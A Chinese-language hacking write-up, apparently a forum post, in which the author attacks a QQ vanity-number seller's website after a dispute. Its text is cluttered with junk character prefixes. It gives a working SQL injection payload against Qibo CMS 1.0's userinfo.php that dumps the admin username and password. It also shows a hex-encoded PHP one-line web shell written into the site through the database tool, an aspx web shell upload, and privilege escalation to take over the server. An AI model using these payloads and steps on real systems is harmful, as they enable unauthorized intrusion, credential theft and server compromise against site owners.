|
3 M# z, r& ^) ]) R
1 ?8 A+ `+ P% d2 K! C& I, ^! G
- L8 |2 b" p4 x6 ~+ I5 q' E
; }5 p/ O' y3 o3 N" ~; \; ` 一、踩点寻找漏洞
7 d* b7 P4 S3 c9 `0 r2 o5 v( _# Z闲来无事,在各个QQ靓号群求买5位QQ,寻问半天无果就在百度搜索5位QQ扫号找到“目标”www.qq.com,打开一看就一静态页面,哇好多靓号啊,90000000,300000,98888888,199999999,哇这么多靓号,然后我去联系客服,要求客服登录账户看看,此处略去100字,然后开始撕逼,然后就有了下文。。。。
( {% {9 n ?9 O( }随手拿御剑扫了一下好多php页面,随手加一个member发现是齐博1.0的内容管理系统,然后就去百度找漏洞,什么后门漏洞一一做测试都无果,找来找去找到一个全版本的注入漏洞,详细利用方法如下: % {2 p! t4 j9 c$ p, T' v+ D
先注册一个用户,记住注册时候的邮箱以uid号, / }0 x8 Q8 x0 A- H [# l+ Z9 q8 F
 % J( j: e3 Q: w) H$ z, t8 \5 s

# t/ _+ N+ h. d& Q: s然后我们打开火狐浏览器简单构造一下,http://www.qq.com/member/userinfo.php?job=edit&step=2,发送数据包如下:
4 F) X, X" L% m7 ~* \; R, K . M) \1 |: \! }+ v+ Q6 R
truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select user()) where uid=3%23
0 ~1 g4 X, z4 S) ?, \# \7 c+ U" t6 w4 W这里的email和uid一定要和注册的账号所吻合,然后访问,提示成功以后查看用户资料如图: 6 E, g) ?! A& L4 z/ S% [) S8 ]
 7 G# o6 V6 D- g& M
确实存在注入漏洞,那么我们来注入一下管理账号密码,修改数据包如:truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select concat(username,0x2e,password) from qb_members limit 1) where uid=3%23 , w* Z, ?) W7 [) c) K! a; M

, m- t' p6 |# G8 f7 }8 ^4 M
% E+ {" P; y0 r" X" E! g解密进后台如图:
: h8 |8 e$ E% }3 R
& t5 t5 \3 w' g. t3 F , {" z# u, p. _- ^
. i* k9 D& f+ K/ V( c6 Z
二、后台getwebshell ' X! U# Y) p. X0 B# N
进了后台,以前齐博有个后台getwebshell漏洞,在系统功能- 单篇文章独立页面管理-增加页面添加个webshell,如图: . s0 }& e' ?3 b0 J
4 Q6 ]7 z4 T' o0 G, l/ b! c

4 K. M+ u( [$ Q * m5 c" F, j5 x
然后点确定,添加提示 ' L! H# Y% `+ k) t
$ S6 e, n+ D9 B' W . \" p" _0 u$ h9 \& j
2 |$ W! A5 o$ I6 [0 S
由于是ii6.0的所以我们可以考虑一下解析漏洞,我们再来如图: ! m, i' O6 a, S0 v" `
- {- G1 U! \) p% B
 o. u4 R( W& @( y# ~
改静态页面为help.php;.htm,然后我们发现访问help.php;.htm是404(写文章之前测试是可以成功写入的),欧巴,他么的我们再想想别的办法,抽了一支烟,我们继续,他这里不是有个服务器信息、数据库工具吗,之前我们测试当前用户名是root,那么我们完全可以考虑利用服务器信息、数据库工具来导入一句话,屌屌的妈妈的,我们来演示一下,先把一句话hex编码一下,<?php assert($_POST[sb]);?>编码以后是:0x3C3F7068702061737365727428245F504F53545B73625D293B3F3EDA网站目录是D:\wwwroot\qq.com\admin\,注意我们要把\改成/,否则不成功D:/wwwroot/qq.com/admin/,下面我们来导一下 , T" o* t2 g+ A+ M! E! q8 X
如图:
; l" u" a S7 N( {! }% Y' m( Y j3 \! c 3 ^% V$ i0 U! m3 n( l& V7 @! ]- V x0 V( w
 + [5 E0 F: y2 g
* N1 g) J, h8 }* S% M- s
之前已经测试过了用普通菜刀无法连接,测试用过狗菜刀也无法连接,用xiese打开
* {7 t* x$ a2 F0 s- H1 T0 d
$ X, j ^( M5 B3 ]+ M) X
; W; w' F, m# u8 z
" y% M1 S5 A5 l$ P三、提权进服务器 ; ?! y9 i" m3 r& @* s
经测试xise下一句话只有在admin目录下有权限浏览,且不能执行命令,庆幸的是支持aspx,那么我们就上一个aspx大马,然后执行命令提示拒绝访问,哈哈在c:\windows\temp下上传cmd.exe然后执行systeminfo,发现打了400多补丁,如图: - x! d: O |1 s

3 {" c( r7 Q) y' |
% j, C. p2 x0 m3 ]啧啧啧,这么多补丁,我都没去试试今年和2014年放出来的exp,而且是在咱们大00下载了一个变异pr,然后上传提权如图: , p. @0 A* e+ v0 d
 + i8 s: a. M2 ^
% D5 i) G" W3 L7 j& `) }1 Q然后登陆服务器如图:
* |0 C- [3 K. U , b% }6 i9 `$ ^! z- p; H
' F$ E" }1 R3 y7 H7 z4 R; o- u
$ {. t. i0 K% V+ D. s3 Y* A. u
- K% q) t. w8 N7 r% q
) y# T& F( b" M难怪普通刀连接不上,原来是有狗。
. R4 l# ^ s( { y8 r: f. F/ N
) A ^$ b) W6 e' q $ `; h% C$ A- x, M# i @
% [6 l* d2 {! |
$ ^, }, x( V0 A. [% s5 T
- _ }( h, z- O+ x5 O& ?) y; Z
6 ~' C0 L" t! w& n. D$ t |